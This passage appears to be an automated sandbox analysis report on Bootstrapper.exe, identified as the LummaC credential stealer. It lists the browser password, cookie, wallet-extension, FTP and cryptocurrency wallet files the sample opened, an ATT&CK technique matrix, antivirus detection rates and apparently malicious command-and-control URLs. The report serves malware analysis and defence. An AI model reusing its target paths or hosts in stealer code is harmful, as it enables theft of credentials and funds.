            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: Bootstrapper.exe, 00000000.00000003.2266468578.0000000000890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: Bootstrapper.exeString found in binary or memory: Wallets/Exodus
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
            Source: Bootstrapper.exe, 00000000.00000003.2266368056.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: Bootstrapper.exeString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 1036, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		21
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services41
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory21
            Virtualization/Sandbox Evasion            		Remote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets22
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Bootstrapper.exe50%VirustotalBrowse
            Bootstrapper.exe39%ReversingLabsWin32.Exploit.LummaC
            Bootstrapper.exe100%AviraHEUR/AGEN.1312582
            Bootstrapper.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://jubbenjusk.biz/0%Avira URL Cloudsafe
            https://jubbenjusk.biz/apims0%Avira URL Cloudsafe
            kickykiduz.lat0%Avira URL Cloudsafe
            https://jubbenjusk.biz/Li0%Avira URL Cloudsafe
            https://jubbenjusk.biz/api1vk0%Avira URL Cloudsafe
